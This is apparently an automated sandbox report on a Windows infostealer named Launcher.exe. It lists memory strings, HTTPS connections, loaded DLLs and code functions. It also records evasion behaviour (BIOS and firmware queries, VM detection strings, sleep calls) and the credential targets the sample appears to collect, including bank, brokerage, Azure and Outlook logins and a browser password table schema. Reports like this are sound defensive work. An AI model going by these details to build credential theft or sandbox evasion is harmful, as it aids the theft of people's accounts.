              Source: Launcher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Launcher.exe, 00000003.00000003.2192933766.0000000005A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: Launcher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: Launcher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: Launcher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00433550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00433550
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00433550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00433550
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023A0500_2_0023A050
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002381900_2_00238190
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002460300_2_00246030
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002310000_2_00231000
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023C5300_2_0023C530
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00243D100_2_00243D10
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002489D00_2_002489D0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023FE200_2_0023FE20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002482700_2_00248270
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023DEF00_2_0023DEF0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002457800_2_00245780
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023C7850_2_0023C785
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00256FF20_2_00256FF2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002460303_2_00246030
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002310003_2_00231000
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0023A0503_2_0023A050
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002381903_2_00238190
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002489D03_2_002489D0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002482703_2_00248270
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00243D103_2_00243D10
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0023FE203_2_0023FE20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0023DEF03_2_0023DEF0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002457803_2_00245780
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00256FF23_2_00256FF2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004228A03_2_004228A0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004271403_2_00427140
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004209703_2_00420970
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043B1003_2_0043B100
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004389D03_2_004389D0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00408AE03_2_00408AE0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00418BE33_2_00418BE3
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00409BA03_2_00409BA0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004244703_2_00424470
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042E4343_2_0042E434
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042DD553_2_0042DD55
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004386603_2_00438660
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004407403_2_00440740
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00440FB03_2_00440FB0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004068403_2_00406840
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042C84A3_2_0042C84A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004380003_2_00438000
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042C8DC3_2_0042C8DC
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004298A83_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004269593_2_00426959
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004061703_2_00406170
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004291003_2_00429100
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004301123_2_00430112
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004269103_2_00426910
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042C9183_2_0042C918
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042C9293_2_0042C929
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004049303_2_00404930
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004241E83_2_004241E8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004409F03_2_004409F0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042A1A23_2_0042A1A2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004281BC3_2_004281BC
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0040DA433_2_0040DA43
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043C2503_2_0043C250
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041FAF03_2_0041FAF0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004253443_2_00425344
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004298A83_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004093003_2_00409300
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042D3183_2_0042D318
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00402B203_2_00402B20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043BB303_2_0043BB30
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004283CA3_2_004283CA
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00424BE23_2_00424BE2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042D3803_2_0042D380
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00420BB03_2_00420BB0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004234503_2_00423450
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043F4503_2_0043F450
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041AC643_2_0041AC64
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0040546B3_2_0040546B
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00405C203_2_00405C20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041CC203_2_0041CC20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00406CD03_2_00406CD0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00440CD03_2_00440CD0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004304FB3_2_004304FB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004184903_2_00418490
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004294BD3_2_004294BD
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004035503_2_00403550
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043F5503_2_0043F550
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042CD673_2_0042CD67
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041F5103_2_0041F510
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004275803_2_00427580
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004085903_2_00408590
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00437DA03_2_00437DA0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00424DB03_2_00424DB0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004096503_2_00409650
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042DD4E3_2_0042DD4E
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004316703_2_00431670
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004266303_2_00426630
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041CED03_2_0041CED0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041B68E3_2_0041B68E
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041EEA03_2_0041EEA0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00403F603_2_00403F60
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0042E7653_2_0042E765
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004277743_2_00427774
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041DF003_2_0041DF00
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043B7003_2_0043B700
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004077E03_2_004077E0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0040AFE03_2_0040AFE0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00419FED3_2_00419FED
              Source: C:\Users\user\Desktop\Launcher.exeCode function: String function: 00408390 appears 46 times
              Source: C:\Users\user\Desktop\Launcher.exeCode function: String function: 0024D198 appears 36 times
              Source: C:\Users\user\Desktop\Launcher.exeCode function: String function: 0024A5E0 appears 66 times
              Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Launcher.exeStatic PE information: Section: .coS ZLIB complexity 1.0003382863562091
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_004389D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004389D0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
              Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Launcher.exe, 00000003.00000003.2148610731.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2169887271.0000000005A78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
              Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
              Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Launcher.exeStatic PE information: section name: .coS
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00249BE5 push ecx; ret 0_2_00249BF8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00249BE5 push ecx; ret 3_2_00249BF8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00415893 push ds; ret 3_2_00415894
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041432B pushad ; ret 3_2_00414334
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0041458B push ds; ret 3_2_00414594
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00414D98 push edx; retf 3_2_00414D9B
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00417FEF push 0FF1762Bh; iretd 3_2_00417FF4
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00249CC2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00249CC2
              Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Launcher.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeAPI coverage: 9.0 %
              Source: C:\Users\user\Desktop\Launcher.exe TID: 6800Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exe TID: 6252Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0025174A FindFirstFileExW,0_2_0025174A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002517FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002517FB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0025174A FindFirstFileExW,3_2_0025174A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002517FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_002517FB
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: Launcher.exe, 00000003.00000003.2256165464.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2301302826.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2237349522.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.00000000034AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: Launcher.exe, 00000003.00000003.2299733490.0000000003473000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2301211251.0000000003473000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX>K
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: Launcher.exe, 00000003.00000003.2169606516.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\Launcher.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0043D920 LdrInitializeThunk,3_2_0043D920
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024A464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024A464
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0026018D mov edi, dword ptr fs:[00000030h]0_2_0026018D
